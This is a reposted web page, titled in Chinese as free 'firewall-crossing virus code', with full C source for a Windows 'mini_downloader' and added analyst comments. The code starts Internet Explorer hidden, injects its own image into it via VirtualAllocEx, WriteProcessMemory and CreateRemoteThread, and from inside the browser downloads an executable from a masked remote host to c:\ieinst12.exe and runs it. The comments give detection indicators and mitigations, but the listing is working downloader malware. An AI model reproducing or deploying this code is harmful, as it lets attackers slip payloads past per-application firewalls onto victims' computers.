免费分享一穿越防火墙病毒代码 -电脑资料


    /*

    "mini_downloader"

    code bykardinal p.s.t

    compile by vc++ 6.0

    can not run under win98;

    */

    #include

    // Analyst note: build directives. These two pragmas link the user32 and kernel32 import libraries.
    #pragma comment(lib,"user32.lib")

    #pragma comment(lib,"kernel32.lib")

    //#pragma comment(linker, "/OPT:NOWIN98")  //uncomment these lines and the compiled file is only 2K in size

    //#pragma comment(linker, "/merge:.data=.text")

    //#pragma comment(linker, "/merge:.rdata=.text")

    //#pragma comment(linker, "/align:0x200")

    // Analyst note: /ENTRY:main makes main() the raw PE entry point (no C runtime start-up),
    // /subsystem:windows builds a GUI-subsystem binary (no console window), and /BASE sets the
    // preferred load address to 0x13150000. main() later requests memory at this image's own
    // base address inside another process, so a very small executable with a non-default,
    // fixed image base is a useful static triage indicator for this sample.
    #pragma comment(linker, "/ENTRY:main")

    #pragma comment(linker, "/subsystem:windows")

    #pragma comment(linker, "/BASE:0x13150000")

    // Analyst note: both pointers below are filled in at run time by download() through
    // LoadLibrary/GetProcAddress, so the two APIs presumably do not show up in the import
    // table; the names "ShellExecuteA" and "URLDownloadToFileA" still appear as plain
    // strings in the binary and can be matched statically.
    HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//function pointer for ShellExecuteA, loaded dynamically from shell32.dll

    DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//function pointer for URLDownloadToFileA, loaded dynamically from Urlmon.dll

    // Handle to the process that main() opens with OpenProcess.
    HANDLE processhandle;

    // Process id that main() obtains from the "IEFrame" window.
    DWORD pid;

    // Module handles for Shell32.dll and urlmon.dll, set in download().
    HINSTANCE hshell,hurlmon;

    // Analyst summary: this is the routine whose address main() passes to CreateRemoteThread,
    // so it is meant to run inside the other process rather than in this program.
    // It loads Shell32.dll and urlmon.dll, resolves ShellExecuteA and URLDownloadToFileA by
    // name, fetches a file over plain HTTP to c:\ieinst12.exe, opens that file, and then calls
    // ExitProcess(0), which ends the process the thread is running in.
    // The host name in the URL is masked ("xxxxxxx") on the page as published.
    //
    // Detection notes (defender view):
    //  - a browser process creating an .exe in the root of C: and then starting it
    //    (file-create and process-create telemetry, e.g. Sysmon Event IDs 11 and 1);
    //  - an HTTP GET for an executable from a browser process that is showing no window;
    //  - the literal path c:\ieinst12.exe is an indicator specific to this listing.
    // Mitigations: application allow-listing that blocks execution from user-writable
    // locations, and proxy/egress inspection that does not rely on which process made
    // the request.
    void download() //download routine used for the injection

    {

    hshell=LoadLibrary("Shell32.dll");

    hurlmon=LoadLibrary("urlmon.dll");

    // Resolve the two APIs by name at run time (see the function-pointer declarations).
    (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");

    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

    // Fetch the remote file to a fixed local path; the content is not verified in any way.
    DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);

    // Launch the downloaded file with the "open" verb; 5 is the show-window argument.
    SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);

    ExitProcess(0);

    };

    // Analyst summary: entry point of the sample. In order, it
    //   1. builds "<system drive>\program files\Internet Explorer\IEXPLORE.EXE" and starts it
    //      with a hidden window (SW_HIDE), then waits 500 ms;
    //   2. looks up a top-level window of class "IEFrame", takes its process id and opens
    //      that process with PROCESS_ALL_ACCESS;
    //   3. reads this image's size from its own PE header and allocates a region of that size,
    //      at this image's own base address, in the opened process with
    //      PAGE_EXECUTE_READWRITE protection;
    //   4. copies this whole image into that region and starts a remote thread at download().
    // The page title describes this as getting through a firewall; presumably the point is
    // that the download is then made by the browser process, which per-application firewall
    // rules tend to trust -- confirm against the product in question.
    //
    // Detection notes (defender view):
    //  - iexplore.exe started hidden by an unusual parent process;
    //  - a cross-process handle opened with full access, followed by VirtualAllocEx with
    //    PAGE_EXECUTE_READWRITE, WriteProcessMemory and CreateRemoteThread (Sysmon Event ID 10
    //    ProcessAccess and Event ID 8 CreateRemoteThread; EDR memory-allocation telemetry);
    //  - a thread in the browser whose start address lies in private executable memory that
    //    is not backed by a module on disk.
    // Mitigations: egress control that does not trust traffic purely by process name, and
    // endpoint rules that block or alert on remote-thread creation into browser processes.
    void main() //main function

    {

    //1. Build the Internet Explorer path and run it

    char iename[MAX_PATH],iepath[MAX_PATH];

    ZeroMemory(iename,sizeof(iename));

    ZeroMemory(iepath,sizeof(iepath));

    GetWindowsDirectory(iepath,MAX_PATH);

    // Keep only the first three characters of the Windows directory (the drive root, e.g. "C:\");
    // iename was zeroed above, so the result is still NUL-terminated.
    strncpy(iename,iepath,3);

    strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");

    //strcat(iename,"windows\\notepad.EXE");

    // SW_HIDE: the browser is started without a visible window.
    WinExec(iename,SW_HIDE);

    Sleep(500);

    //2. Get the IE process handle

    HWND htemp;

    // Matches any top-level window with class name "IEFrame", not specifically the one just started.
    htemp=FindWindow("IEFrame",NULL);

    GetWindowThreadProcessId(htemp,&pid);

    processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    //3. Allocate memory

    HMODULE Module;

    LPVOID NewModule;

    DWORD Size;

    LPDWORD lpimagesize;

    Module = GetModuleHandle(NULL);//base address of this process's image

    //get the size of the in-memory image
    // The inline assembly reads the DWORD at Module+0x3c (offset of the PE header), then the
    // DWORD at that header + 0x50, which is the SizeOfImage field for a 32-bit PE, and stores
    // it in lpimagesize.

    _asm

    {

    push eax;

    push ebx;

    mov ebx,Module;

    mov eax,[ebx+0x3c];

    lea eax,[ebx+eax+0x50];

    mov eax,[eax]

    mov lpimagesize,eax;

    pop ebx;

    pop eax;

    };

    // lpimagesize holds the size value itself, not a pointer; it is only cast back to a DWORD here.
    Size=(DWORD)lpimagesize;

    NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//request the region at the same start address as this image's base

    //4. Write memory, create thread

    WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write the data

    LPTHREAD_START_ROUTINE entrypoint;

    // The inline assembly below stores the address of download() in entrypoint.
    __asm

    {

    push eax;

    lea eax,download;

    mov entrypoint,eax;

    pop eax

    }

    CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);   //create the remote thread and run it 
